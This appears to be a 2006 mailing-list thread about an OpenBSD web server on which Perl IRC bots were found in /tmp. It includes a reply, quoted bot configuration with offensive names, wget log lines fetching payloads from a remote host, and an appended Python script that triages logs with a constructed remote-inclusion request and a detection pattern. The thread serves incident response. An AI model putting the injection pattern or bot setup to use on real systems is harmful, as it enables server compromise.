Hi,
Standard advice is to reinstall the OS (3.8? ;-) and then _data_ only from a known good backup. You could use a boot CD-ROM and dd off an image of the disk for later analysis first, if you want.

Is there some attack vector like PHP or such available on the machine? Maybe they used that to retrieve and write the file? ... but access to /tmp is tricky from a chrooted httpd!
/Pete

On 4. jan. 2006, at 15.50, Gaby vanhegan wrote:
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:

    ###################################
    Microsoft Search Worm - by br0k3d
    ###########################################
    #### #####
    From the same author of LinuxDay Worm and other variants
    #### #######

And:

    # ShellBOT
    # 0ldW0lf - [EMAIL PROTECTED]
    #         - www.atrix-br.cjb.net
    #         - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DoS, and the like. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is:

    # IRC
    my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala"); # admin nicks
    my @canais=("#gestapo");
    my $nick='ADOLFHITLER'; # bot nick.. if the nick is already in use.. it will show up with a random number at the end
    my $ircname = 'SSSA';
    chop (my $realname = `uname -a`);
    $servidor='irc.agitamanaus.net' unless $servidor; # IRC server to use if none is given in the argument
    my $porta='6667'; # IRC server port

My question is how did these files get onto the machine? I have entries in the httpd error log that look like this:

    --05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
               => `/tmp/.cpanel'
    Resolving arnold.dvclub.com.hk... done.
    Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
    HTTP request sent, awaiting response...
    --05:10:57--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
               => `/tmp/.cpanel.tmp'
    Resolving arnold.dvclub.com.hk... done.
    Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out.
    Retrying.

    --05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2)
               => `/tmp/.cpanel.tmp'
    Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
    Length: 3,355 [text/plain]
    0K ...                                   100%  468.05 KB/s
    05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk).

Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site. I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem.

As far as I can tell, there is no damage, but there are some entries like these in the error logs:

    /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
    /tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
    /tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :)

So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list.

I would provide a dmesg, but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file.

Gaby

-- 
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
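Added example (not part of the thread, and not Gaby's or Pete's code): a small Python triage script that does what the thread describes doing by hand. It pulls the wget fetch lines and the failed "run an ELF through sh" lines out of an Apache error_log, then pairs each fetch with access_log requests that arrived in the seconds before it and flags requests that carry a URL or "wget" in the request line. Every log line in it is constructed to resemble the excerpts in the thread; the request that ends up flagged is a placeholder, since the thread does not identify the real vector, and the suspect-pattern regex and the 60-second window are my own assumptions.

```python
"""Triage helper for wget output turning up in Apache's error_log.

Added example, not from the original thread. All log data below is
constructed; only the line *formats* follow the excerpts in the thread.
"""
import re
from datetime import datetime, timedelta

# Constructed error_log, modelled on the wget output and the
# "/tmp/x44423[1]: ^?ELF...: not found" lines quoted in the thread.
ERROR_LOG = """\
--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
           => `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2)
           => `/tmp/.cpanel.tmp'
05:12:27 (468.05 KB/s) - `/tmp/.cpanel.tmp' saved [3355/3355]
/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
/tmp/x44423[4]: syntax error: `(' unexpected
"""

# Constructed combined-format access_log for one vhost. The first request is
# a placeholder for "whatever script was abused" (a URL passed in a query
# parameter); the thread does not say what the real vector was.
ACCESS_LOG = """\
203.0.113.9 - - [04/Jan/2006:05:10:45 +0000] "GET /site/view.php?page=http://203.0.113.80/t.txt HTTP/1.0" 200 512 "-" "-"
198.51.100.7 - - [04/Jan/2006:03:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jan/2006:05:12:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

WGET_START = re.compile(r'^--(\d\d:\d\d:\d\d)--\s+(\S+)')        # --HH:MM:SS--  URL
WGET_DEST = re.compile(r"^\s*=> `([^']+)'")                      #   => `/tmp/...'
ELF_VIA_SH = re.compile(r'^(\S+?)\[\d+\]: \^\?ELF.*: not found$')  # sh choking on an ELF
ACCESS = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')
# Heuristic (assumption): request lines that smuggle a URL or wget into a parameter.
SUSPECT = re.compile(r'wget|/tmp/|=https?(?::|%3a)//', re.I)


def parse_wget_fetches(text):
    """Return [{'time', 'url', 'dest'}] for each wget start line, pairing it
    with the following "=> `dest'" line when present."""
    fetches, pending = [], None
    for line in text.splitlines():
        m = WGET_START.match(line)
        if m:
            pending = {'time': m.group(1), 'url': m.group(2), 'dest': None}
            fetches.append(pending)
            continue
        m = WGET_DEST.match(line)
        if m and pending is not None and pending['dest'] is None:
            pending['dest'] = m.group(1)
    return fetches


def parse_failed_elf_exec(text):
    """Paths of files the shell tried to execute as scripts but which start
    with an ELF header (what you see when a Linux binary is run without
    Linux emulation on OpenBSD). Deduplicated, in order of appearance."""
    seen = []
    for line in text.splitlines():
        m = ELF_VIA_SH.match(line)
        if m and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def parse_access(text):
    """Return [{'ip', 'when' (naive datetime, tz dropped), 'request', 'status'}]."""
    entries = []
    for line in text.splitlines():
        m = ACCESS.match(line)
        if not m:
            continue
        when = datetime.strptime(m.group(2).split()[0], '%d/%b/%Y:%H:%M:%S')
        entries.append({'ip': m.group(1), 'when': when,
                        'request': m.group(3), 'status': m.group(4)})
    return entries


def correlate(fetches, access, window_seconds=60):
    """Pair each wget fetch with access_log requests from the preceding
    window. wget logs only a clock time, so the date is taken from each
    access entry (assumes logs from the same day). An empty result, as in the
    thread, means the request hit a vhost that logs somewhere else."""
    window = timedelta(seconds=window_seconds)
    hits = []
    for f in fetches:
        t = datetime.strptime(f['time'], '%H:%M:%S').time()
        for a in access:
            delta = datetime.combine(a['when'].date(), t) - a['when']
            if timedelta(0) <= delta <= window:
                hits.append({'url': f['url'], 'dest': f['dest'], 'ip': a['ip'],
                             'request': a['request'],
                             'suspect': bool(SUSPECT.search(a['request']))})
    return hits


if __name__ == '__main__':
    fetches = parse_wget_fetches(ERROR_LOG)
    for h in correlate(fetches, parse_access(ACCESS_LOG)):
        print('SUSPECT' if h['suspect'] else 'maybe  ', h['ip'], h['request'], '->', h['dest'])
    for path in parse_failed_elf_exec(ERROR_LOG):
        print('ELF run via sh (emulation off?):', path)
```

Run it against real logs by replacing the two constructed strings with the contents of error_log and each vhost's transfer log; the "bulk grep" step from the thread is the SUSPECT pattern, applied only to requests that fall inside the window, so a busy site's log stays readable.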